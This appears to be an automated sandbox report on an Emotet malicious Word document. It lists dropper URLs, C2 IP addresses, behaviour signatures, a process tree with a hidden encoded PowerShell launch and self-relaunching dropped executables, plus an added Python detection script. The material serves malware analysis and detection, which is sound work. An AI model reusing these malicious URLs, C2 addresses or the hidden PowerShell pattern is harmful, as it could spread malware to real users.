Analysis

  • max time kernel
    142s
  • resource
    win10v191014
  • submitted
    11-12-2019 05:53

General

  • Target

    Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc

  • Sample

    191211-xf6bzaykg2

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/
    https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/
    http://homemyland.net/tmp/wUHdeBS/
    https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/
    http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Extracted

  • Family
    emotet
  • C2
    200.41.121.69:443
    153.190.41.185:80
    165.100.148.200:443
    103.9.145.19:8080
    46.105.128.215:8080
    172.105.213.30:80
    69.30.205.162:7080
    172.104.70.207:8080
    198.57.217.170:8080
    103.122.75.218:80
    212.112.113.235:80
    113.52.135.33:7080
    60.53.3.153:8080
    1.32.54.12:8080
    142.93.87.198:8080
    91.117.31.181:80
    45.129.121.222:443
    186.215.101.106:80
    143.95.101.72:8080
    187.233.220.93:443
  • rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Drops file in System32 directory 6 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4984
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4476
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4708
    • C:\Users\Admin\216.exe
      "C:\Users\Admin\216.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4764
      • C:\Users\Admin\216.exe
        --7272c7d5
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        • Executes dropped EXE
        PID:4420
  • C:\Windows\SysWOW64\defprint.exe
    "C:\Windows\SysWOW64\defprint.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:4104
    • C:\Windows\SysWOW64\defprint.exe
      --c67f8d9a
      2⤵
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:4152
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Drops file in Windows directory
    PID:4216
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
    1⤵
    PID:4244
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
    1⤵
    PID:3388
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k unistacksvcgroup
    1⤵
    PID:4652
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
    1⤵
    PID:3608
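The process tree above carries the behaviours a detection engineer would key on: PowerShell started with the abbreviated switches -w hidden and -en, a dropped EXE in the user profile re-launching itself with a single eight-hex-digit "--" argument, and the same pattern repeating once the binary has been installed as SysWOW64\defprint.exe. Note that Powershell.exe and defprint.exe are shown at depth 1, so the report records no parent for them; the heuristics below therefore work from command lines and dropped-file paths rather than from a WINWORD parent. This is an added example and not part of the sandbox report: the process records are constructed from the PIDs, image paths and command lines shown, the base64 payload is a placeholder because the real encoded command is not on the page, and the rule names are my own.

```python
"""Heuristics over the process records of the Emotet maldoc report above.

Added example, not part of the sandbox report. PROCESSES and DROPPED are
constructed from the PIDs, image paths, command lines and Downloads shown;
the base64 payload is a placeholder because the real one is not on the page.
"""
import ntpath
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Process:
    pid: int
    image: str
    cmdline: str


PROCESSES = [  # constructed from the report's Processes section
    Process(4984, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
            r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
            r'"C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc" /o ""'),
    Process(4708, r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe",
            "Powershell -w hidden -en JABhAGIAYwA9ACcAeAAnAA=="),  # placeholder payload
    Process(4764, r"C:\Users\Admin\216.exe", r'"C:\Users\Admin\216.exe"'),
    Process(4420, r"C:\Users\Admin\216.exe", "--7272c7d5"),
    Process(4104, r"C:\Windows\SysWOW64\defprint.exe", r'"C:\Windows\SysWOW64\defprint.exe"'),
    Process(4152, r"C:\Windows\SysWOW64\defprint.exe", "--c67f8d9a"),
    Process(4216, r"c:\windows\system32\svchost.exe", r"c:\windows\system32\svchost.exe -k netsvcs -s BITS"),
]
DROPPED = {r"C:\Users\Admin\216.exe", r"C:\Windows\SysWOW64\defprint.exe"}  # from Downloads

# powershell.exe parameters; any unambiguous prefix is accepted (-w, -win, -en, -enc ...).
PS_PARAMS = ("command", "encodedcommand", "executionpolicy", "file", "inputformat", "mta",
             "noexit", "nologo", "noninteractive", "noprofile", "outputformat", "sta",
             "version", "windowstyle")
PS_TAKES_VALUE = {"command", "encodedcommand", "executionpolicy", "file", "windowstyle"}
REEXEC_TAG = re.compile(r"^--[0-9a-f]{8}$", re.IGNORECASE)


def split_cmdline(cmdline: str) -> List[str]:
    """Windows-style split: backslashes stay literal, quoted tokens stay whole."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def canonical_ps_param(token: str) -> Optional[str]:
    """Expand an abbreviated powershell.exe switch; None if not a switch or ambiguous."""
    if not token.startswith("-") or len(token) < 2:
        return None
    name = token[1:].lower()
    if name == "e":  # powershell.exe resolves a bare -e to -EncodedCommand
        return "encodedcommand"
    matches = [p for p in PS_PARAMS if p.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def powershell_indicators(argv: List[str]) -> List[str]:
    """Flag an encoded command and/or a hidden window whatever the abbreviation used."""
    params, i = {}, 0
    while i < len(argv):
        p = canonical_ps_param(argv[i])
        if p is None:
            i += 1
        elif p in PS_TAKES_VALUE and i + 1 < len(argv):
            params[p], i = argv[i + 1], i + 2
        else:
            params[p], i = True, i + 1
    hits = []
    if "encodedcommand" in params:
        hits.append("powershell-encoded-command")
    ws = params.get("windowstyle")
    if isinstance(ws, str) and ws and "hidden".startswith(ws.lower()):  # "-w h" hides too
        hits.append("powershell-hidden-window")
    return hits


def arguments(proc: Process) -> List[str]:
    """Arguments without the image. The re-launched copies in the report have a command
    line that is only the tag ('--7272c7d5'), so argv[0] is not always the image."""
    argv = split_cmdline(proc.cmdline)
    if argv and argv[0].lower() in (proc.image.lower(), ntpath.basename(proc.image).lower()):
        argv = argv[1:]
    return argv


def is_reexec_with_hex_tag(proc: Process) -> bool:
    """Emotet's copy re-launches itself with exactly one --<8 hex digits> argument."""
    args = arguments(proc)
    return len(args) == 1 and REEXEC_TAG.match(args[0]) is not None


def triage(processes: List[Process], dropped: set) -> List[Tuple[int, str]]:
    dropped_lc = {p.lower() for p in dropped}
    findings = []
    for proc in processes:
        if ntpath.basename(proc.image).lower() in ("powershell.exe", "pwsh.exe"):
            findings += [(proc.pid, h) for h in powershell_indicators(split_cmdline(proc.cmdline))]
        if proc.image.lower() in dropped_lc:  # the report's "Executes dropped EXE"
            findings.append((proc.pid, "executes-dropped-exe"))
        if is_reexec_with_hex_tag(proc):
            findings.append((proc.pid, "reexec-with-hex-tag"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(PROCESSES, DROPPED):
        print(pid, rule)
```

The switch expansion matters because powershell.exe accepts any unambiguous prefix of a parameter name, so a rule that looks only for the literal "-EncodedCommand" or "-WindowStyle Hidden" misses "-en" and "-w hidden" as used here, and would equally miss "-enc" or "-w h". The re-exec rule keys on the argument alone so that it fires both for the dropped copy under C:\Users and for the installed copy under SysWOW64.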

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    • Disabling Security Tools (T1089): 1 signature
    • Modify Registry (T1112): 1 signature
  • Discovery
    • Query Registry (T1012): 3 signatures
    • System Information Discovery (T1082): 3 signatures

Downloads

  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Windows\SysWOW64\defprint.exe
  • C:\Windows\SysWOW64\defprint.exe
  • memory/4104-23-0x0000000000560000-0x0000000000577000-memory.dmp
    Filesize: 92KB
  • memory/4152-25-0x0000000000730000-0x0000000000747000-memory.dmp
    Filesize: 92KB
  • memory/4152-26-0x0000000000400000-0x0000000000492000-memory.dmp
    Filesize: 584KB
  • memory/4420-11-0x00000000021A0000-0x00000000021B7000-memory.dmp
    Filesize: 92KB
  • memory/4420-12-0x0000000000400000-0x0000000000492000-memory.dmp
    Filesize: 584KB
  • memory/4764-9-0x0000000002180000-0x0000000002197000-memory.dmp
    Filesize: 92KB
  • memory/4984-0-0x000001D9E9970000-0x000001D9E9971000-memory.dmp
    Filesize: 4KB
  • memory/4984-1-0x000001D9E4F41000-0x000001D9E4F46000-memory.dmp
    Filesize: 20KB